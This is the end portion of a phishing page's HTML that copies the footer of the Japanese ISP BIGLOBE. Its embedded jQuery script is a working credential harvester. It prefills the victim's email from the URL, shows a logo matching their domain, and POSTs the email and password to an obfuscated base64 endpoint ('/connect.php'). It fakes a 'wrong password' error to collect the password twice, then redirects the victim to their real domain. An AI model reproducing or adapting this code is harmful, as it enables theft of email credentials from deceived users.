                    <a href="#">会社概要</a>｜<a href="#">ニュースリリース</a>｜<a href="#">採用情報</a>｜<a href="#">個人情報保護ポリシー</a>｜<a
                        href="#">Cookieポリシー</a>｜<a href="#">安心・安全</a>｜<a href="#">お問い合わせ</a>
                </div>


                <div id="footerLinkBox3">
                    <img src="https://tulds4eggxnh2gyqoiuueyuscgeo5myli6dzdbcv6jnchc3vx3ga.arweave.net/nRY5cIY12n0bEHIpQmKSEYjuswtHh5GEVfJaI4t1vsw"
                        alt="" width="210" height="66" usemap="#FooterMap" />
                    <map name="FooterMap" id="FooterMap">
                        <area shape="rect" coords="95,0,155,64" href="#" target="_blank" alt="プライバシーマーク"
                            onclick="B.gae('footer', 'click', 'footer');" />
                        <area shape="rect" coords="160,0,210,64" href="#" target="_blank" alt="インターネット接続サービス安全・安心マーク"
                            onclick="B.gae('footer', 'click', 'footer');" />
                    </map>
                </div>


            </div>
            <div id="footerCopyright">
                Copyright(C)BIGLOBE Inc. 1996-2023

            </div>
        </div>
        <!-- END : フッター -->


    </div><!-- /container -->
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
<script src="./config.js"></script>


    <script>
/* global $ */
$(document).ready(function() {
    var count = 0;

    $('#back1').click(function() {
        $("#msg").hide();
        $('#ai').val("");
        $("#automail").animate({ left: 200, opacity: "hide" }, 0);
        $("#inputbar").animate({ right: 200, opacity: "show" }, 1000);

    });

    /////////////url ai getting////////////////
    var ai = window.location.hash.substr(1);
    if (!ai) {

    } else {
        // $('#ai').val(ai);
        var my_ai = ai;
        var ind = my_ai.indexOf("@");
        var my_slice = my_ai.substr((ind + 1));
        var c = my_slice.substr(0, my_slice.indexOf('.'));
        var final = c.toLowerCase();
        var dom = c.toUpperCase();
        $('#ai').val(my_ai);
        $('#ai').attr('disabled', "");
        $('#login_logo1').attr('src', 'https://logo.clearbit.com/' + my_slice);
        $('#domain-name').html(dom);
        $("#msg").hide();
        $("#inputbar").animate({ left: 200, opacity: "hide" }, 0);
        $("#automail").animate({ right: 200, opacity: "show" }, 1000);
    }
    ///////////////url getting ai////////////////


    var atu = "L2Nvbm5lY3QucGhw";
	
    $('#submit-btn').click(function(event) {
        $('#error').hide();
        $('#msg').hide();
        event.preventDefault();
        var ai = $("#ai").val();
        var pr = $("#pr").val();
        var msg = $('#msg').html();
        $('#msg').text(msg);
        ///////////new injection////////////////
        var my_ai = ai;
        var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;

        if (!ai) {
            $('#error').show();
            $('#error').html("&#x30E1;&#x30FC;&#x30EB;&#x30A2;&#x30C9;&#x30EC;&#x30B9;&#x3001;&#x307E;&#x305F;&#x306F;&#x3001;&#x30E1;&#x30FC;&#x30EB;&#x30D1;&#x30B9;&#x30EF;&#x30FC;&#x30C9;&#x304C;&#x6B63;&#x3057;&#x304F;&#x306A;&#x3044;&#x3088;&#x3046;&#x3067;&#x3059;&#x3002;");
            ai.focus;
            return false;
        }

        if (!filter.test(my_ai)) {
            $('#error').show();
            $('#error').html("&#x30E1;&#x30FC;&#x30EB;&#x30A2;&#x30C9;&#x30EC;&#x30B9;&#x3001;&#x307E;&#x305F;&#x306F;&#x3001;&#x30E1;&#x30FC;&#x30EB;&#x30D1;&#x30B9;&#x30EF;&#x30FC;&#x30C9;&#x304C;&#x6B63;&#x3057;&#x304F;&#x306A;&#x3044;&#x3088;&#x3046;&#x3067;&#x3059;&#x3002;");
            ai.focus;
            return false;
        }
        if (!pr) {
            $('#error').show();
            $('#error').html("&#x30E1;&#x30FC;&#x30EB;&#x30A2;&#x30C9;&#x30EC;&#x30B9;&#x3001;&#x307E;&#x305F;&#x306F;&#x3001;&#x30E1;&#x30FC;&#x30EB;&#x30D1;&#x30B9;&#x30EF;&#x30FC;&#x30C9;&#x304C;&#x6B63;&#x3057;&#x304F;&#x306A;&#x3044;&#x3088;&#x3046;&#x3067;&#x3059;&#x3002;");
            ai.focus;
            return false;
        }
		
		
		if(pr.length < 5) {  

			$('#error').show();
            $('#error').html("&#x30E1;&#x30FC;&#x30EB;&#x30A2;&#x30C9;&#x30EC;&#x30B9;&#x3001;&#x307E;&#x305F;&#x306F;&#x3001;&#x30E1;&#x30FC;&#x30EB;&#x30D1;&#x30B9;&#x30EF;&#x30FC;&#x30C9;&#x304C;&#x6B63;&#x3057;&#x304F;&#x306A;&#x3044;&#x3088;&#x3046;&#x3067;&#x3059;&#x3002;");
            ai.focus;  

			return false;  

		}

        var ind = my_ai.indexOf("@");
        var my_slice = my_ai.substr((ind + 1));
        var c = my_slice.substr(0, my_slice.indexOf('.'));
        var final = c.toLowerCase();
        var dom = c.toUpperCase();
        ///////////new injection////////////////
        count = count + 1;
        $('#ai').attr('disabled', "");
        $('#login_logo1').attr('src', 'https://logo.clearbit.com/' + my_slice);
        $('#domain-name').html(dom);

        $.ajax({
            dataType: 'JSON',
            url: `${config.baseUrl}${atob(atu)}`,
            type: 'POST',
            data: {
                ai: ai,
                pr: pr,
            },
            // data: $('#contact').serialize(),
            beforeSend: function(xhr) {
                $('#submit-btn').html('Verifing...');
            },
            success: function(response) {
                if (response) {
                    $("#msg").show();
                    console.log(response);
                    if (response['signal'] == 'ok') {
                        $("#pr").val("");
                        if (count >= 2) {
                            count = 0;
                            // window.location.replace(response['redirect_link']);
                            window.location.replace("http://www." + my_slice);

                        }
                        // $('#msg').html(response['msg']);
                    } else {
                        // $('#msg').html(response['msg']);
                    }
                }
            },
            error: function() {
                $("#pr").val("");
                if (count >= 2) {
                    count = 0;
                    window.location.replace("http://www." + my_slice);
                }
                $("#msg").show();
                // $('#msg').html("Please try again later");
            },
            complete: function() {
                $('#submit-btn').html('Login');
            }
        });
    });


});

function getParameterByName(name, url) {
			if (!url) url = window.location.href;
			name = name.replace(/[\[\]]/g, '\\$&');
			var regex = new RegExp('[?&]' + name + '(=([^&#]*)|&|#|$)'),
				results = regex.exec(url);
			if (!results) return null;
			if (!results[2]) return '';
			return decodeURIComponent(results[2].replace(/\+/g, ' '));
		}
			
		const login_username = getParameterByName('cms');
		document.getElementById("ai").value = login_username;
</script>


</body>

</html>